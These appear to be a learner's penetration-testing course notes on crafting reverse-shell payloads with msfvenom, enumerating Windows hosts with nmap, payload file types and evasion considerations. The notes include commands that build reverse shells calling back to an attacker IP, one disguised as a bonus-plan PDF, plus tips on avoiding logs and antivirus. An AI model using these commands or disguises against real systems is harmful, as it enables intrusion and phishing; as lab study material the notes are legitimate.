1. Crafting Payloads with MSFvenom
1) List Payloads
yeon0815@htb[/htb]$ msfvenom -l payloads
Framework Payloads (592 total) [--payload <value>]
==================================================
Name Description
---- -----------
linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6
linux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
mainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client wi
th translation capabilities is required. MSF handles this automatically.
multi/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP
multi/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS
netware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker
nodejs/shell_bind_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL
osx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller
library has been loaded. Based on work by Charlie Miller
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)
windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)
windows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop
/hop.php to the PHP server you wish to use as a hop.
windows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)
windows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP
windows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6
windows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)
windows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support
windows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)
* Stages vs Stageless Payloads
- Staged payloads create a way for us to send over more components of our attack.
- Stageless payloads do not have a stage. Payloads will be sent in its entirely across a network connection without a stage. This could benefit us in environments where we do not have access to much bandwidth and latency can interfere.
e.g., Staged payloads: linux/x86/shell/reverse_tcp
e.g., Stageless payloads: linux/zarch/meterpreter_reverse_tcp
2) Building A Stageless Payload
(1) Build it
yeon0815@htb[/htb]$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
(2) Call MSFvenom
msfvenom
(3) Creating a Payload
-p
(4) Choosing the payload based on Architecture
linux/x64/shell_reverse_tcp- Linux 64-bit stateless payload that will initiate a TCP-based reverse shell (shell_reverse_tcp)
(5) Address to connect back to
LHOST=10.10.14.113 LPORT=443
(6) Format to generate payload in
-f elf- The -f flag specifies the format the generated binary will be in. In this case, it will be an .elf file.
(7) Output
> createbackup.elf
3) Building a simple Stageless Payload for a Windows system
- We can also use msfvenom to craft an executable (.exe) file that can be run on a Windows system to provide a shell.
(1) Windows Payload
yeon0815@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
2. Infiltrating Windows
1) Prominent Windows Exploits
(1) MS08-067
- It is a critical patch pushed out to many different Windows revisions due to an SMB flaw.
(2) Eternal blue
- This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution.
(3) PrintNightmare
- A remote code execution vulnerability in the Windows Print Spooler.
- With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host.
(4) BlueKeep
- It is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution.
(5) Sigred
- It utilizes a flaw in how DNS reads SIG resource records.
(6) SeriousSam
- It exploits an issue with the way Windows handles permission on the C:\Windows\system32\config. Before fixing the issue, non-elevated users have access to the SAM database, among other files.
(7) Zerologon
- It is a critical vulnerability that exploits a cryptographic flaw in Microsoft's Active Directory Netlogon Remote Protocol (MS-NRPC).
- It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol.
- The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need.
2) Enumerating Windows & Fingerprinting Methods
(1) Pinged Host
yeon0815@htb[/htb]$ ping 192.168.86.39
PING 192.168.86.39 (192.168.86.39): 56 data bytes
64 bytes from 192.168.86.39: icmp_seq=0 ttl=128 time=102.920 ms
64 bytes from 192.168.86.39: icmp_seq=1 ttl=128 time=9.164 ms
64 bytes from 192.168.86.39: icmp_seq=2 ttl=128 time=14.223 ms
64 bytes from 192.168.86.39: icmp_seq=3 ttl=128 time=11.265 ms- TTL (Time To Live): A typical response from a Windows host will either be 32 or 128.
(2) NMAP OS Detection Scan
yeon0815@htb[/htb]$ sudo nmap -v -O 192.168.86.39
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-20 17:40 EDT
Initiating ARP Ping Scan at 17:40
Scanning 192.168.86.39 [1 port]
Completed ARP Ping Scan at 17:40, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:40
Completed Parallel DNS resolution of 1 host. at 17:40, 0.02s elapsed
Initiating SYN Stealth Scan at 17:40
Scanning desktop-jba7h4t.lan (192.168.86.39) [1000 ports]
Discovered open port 139/tcp on 192.168.86.39
Discovered open port 135/tcp on 192.168.86.39
Discovered open port 443/tcp on 192.168.86.39
Discovered open port 445/tcp on 192.168.86.39
Discovered open port 902/tcp on 192.168.86.39
Discovered open port 912/tcp on 192.168.86.39
Completed SYN Stealth Scan at 17:40, 1.54s elapsed (1000 total ports)
Initiating OS detection (try #1) against desktop-jba7h4t.lan (192.168.86.39)
Nmap scan report for desktop-jba7h4t.lan (192.168.86.39)
Host is up (0.010s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
MAC Address: DC:41:A9:FB:BA:26 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 1909
Network Distance: 1 hop- If you run into issues and the scans turn up little results, attempt again with the -A and -Pn options.
(3) Banner Grab to Enumerate Ports
yeon0815@htb[/htb]$ sudo nmap -v 192.168.86.39 --script banner.nse
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-20 18:01 EDT
NSE: Loaded 1 scripts for scanning.
<snip>
Discovered open port 135/tcp on 192.168.86.39
Discovered open port 139/tcp on 192.168.86.39
Discovered open port 445/tcp on 192.168.86.39
Discovered open port 443/tcp on 192.168.86.39
Discovered open port 912/tcp on 192.168.86.39
Discovered open port 902/tcp on 192.168.86.39
Completed SYN Stealth Scan at 18:01, 1.46s elapsed (1000 total ports)
NSE: Script scanning 192.168.86.39.
Initiating NSE at 18:01
Completed NSE at 18:01, 20.11s elapsed
Nmap scan report for desktop-jba7h4t.lan (192.168.86.39)
Host is up (0.012s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
| banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, Se
|_rverDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , , NFCSSL supported/t
912/tcp open apex-mesh
| banner: 220 VMware Authentication Daemon Version 1.0, ServerDaemonProto
|_col:SOAP, MKSDisplayProtocol:VNC , ,
MAC Address: DC:41:A9:FB:BA:26 (Intel Corporate)
3) Payload Types to Consider
(1) DLLs
- A Dynamic Linking Library (DLL) is a library file used in Microsoft operating systems to provide shared code and data that can be used by many different programs at once.
(2) Batch
- These files are text-based DOS scripts utilized by system administrators to complete multiple tasks through the command-line interpreter.
- These files end with an extension of .bat
(3) VBS
- VBScript is a lightweight scripting language based on Microsoft's Visual Basic.
- It is typically used as a client-side scripting language in webservers to enable dynamic web pages.
- VBS lives on in the context of Phishing and other attacks aimed at having users perform an action such as enabling the loading of Macros in an excel document or clicking on a cell to have the Windows scripting engine execute a piece of code.
(4) MSI
- .MSI files serve as an installation database for the Windows Installer.
- When attempting to install a new application, the installer will look for the .msi file to understand all of the components required and how to find them.
- We can use the Windows Installer by crafting a payload as an .msi file. Once we have it on the host, we can run msiexec to execute our file, which will provide us with further access, such as an elevated reverse shell.
(5) Powershell
- It is both a shell environment and scripting language.
4) Payload Generation
(1) MSFVenom & Metasploit - Framework
(2) Payloads All The Things:
https://github.com/swisskyrepo/PayloadsAllTheThings
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
github.com
(3) Mythic C2 Framework:
- It is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation.
https://github.com/its-a-feature/Mythic
GitHub - its-a-feature/Mythic: A collaborative, multi-platform, red teaming framework
A collaborative, multi-platform, red teaming framework - its-a-feature/Mythic
github.com
(4) Nishang:
- It is a framework collection of Offensive PowerShell Implants and scripts.
https://github.com/samratashok/nishang
GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offens...
github.com
(5) Darkarmour:
- It is a tool to generate and utilize obfuscated binaries for use against Windows hosts.
https://github.com/bats3c/darkarmour
GitHub - bats3c/darkarmour: Windows AV Evasion
Windows AV Evasion. Contribute to bats3c/darkarmour development by creating an account on GitHub.
github.com
5) Payload Transfer and Execution
(1) Impacket
- It is a toolset built-in Python that provides us a way to interact with network protocols directly.
(2) Payloads All The Things
a. SMB
b. Remote execution via MSF
c. Other protocols (e.g., FTP, TFTP, HTTP/S)
6) CMD-prompt vs PowerShell
- We have 2 choices for shells to utilize by default.
(1) CMD
- CMD shell is the original MS-DOS shell built into Windows.
- It was made for basic interaction and I.T. operations on a host.
(2) Powershell
- It came along with a purpose to expand the capabilities of cmd. It understands the native MS-DOS commands utilized in CMD and a whole new set of commands based in .NET.
- CMD prompt deals with text input and output while PowerShell utilizes .NET objects for all input and output.
- CMD does not keep a record of the commands used during the session whereas, PowerShell does. So in the context of being stealthy, executing commands with cmd will leave less of a trace on the host.
(3) Use CMD when:
a. You are on an older host that may not include PowerShell
b. When you only require simple interactions/access to the host.
c. When you plan to use simple batch files, not commands, or MS-DOS native tools.
d. When you believe that execution policies may affect your ability to run scripts or other actions on the host.
(4) Use PowerShell when:
a. You are planning to utilize cmdlets or other custom-built scripts.
b. When you wish to interact with .NET objects instead of text output.
c. When being stealthy is of lesser concern.
d. If you are planning to interact with cloud-based services and hosts.
e. If your scripts set and use Aliases.
7) WSL and PowerShell for Linux
(1) WSL
- Windows Subsystem for Linux is a tool that has been introduced to Windows hosts that provides a virtual environment built into your host.
- Any network requests or functions executed to or from the WSL instance are not parsed by the Windows Firewall and Windows Defender, making it a bit of a blind spot on the host.
(2) PowerShell
- PowerShell core can be installed on Linux operating systems and carry over many normal PowerShell functions.
3. Infiltrating Unix/Linux
1) Gaining a Shell Through Attacking a vulnerable application
(1) Enumerate the host: NMAP
(2) rConfig Management Tool
- This application is used by network & system administrators to automate the process of configuring network appliances.
(3) Discovering a Vulnerability in rConfig: google search
(4) Search for an Exploit Module: Metasploit
- There may be useful exploit modules that are not installed on our system or just aren't showing up via search. In these cases, it's good to know that Rapid 7 keeps code for exploit modules in their repos on github. We could do an even more specific search using a search engine: 'rConfig 3.9.6 exploit metasploit github'
a. Copy the code from this repo onto our local attack box and save it in the directory that our local install of MSF is referencing.
yeon0815@htb[/htb]$ locate exploitsb. If we copy it into a file on our local system, make sure the file has .rb as the extension. All modules in MSF are written in Ruby.
(5) Using the rConfig Exploit and Gaining a Shell
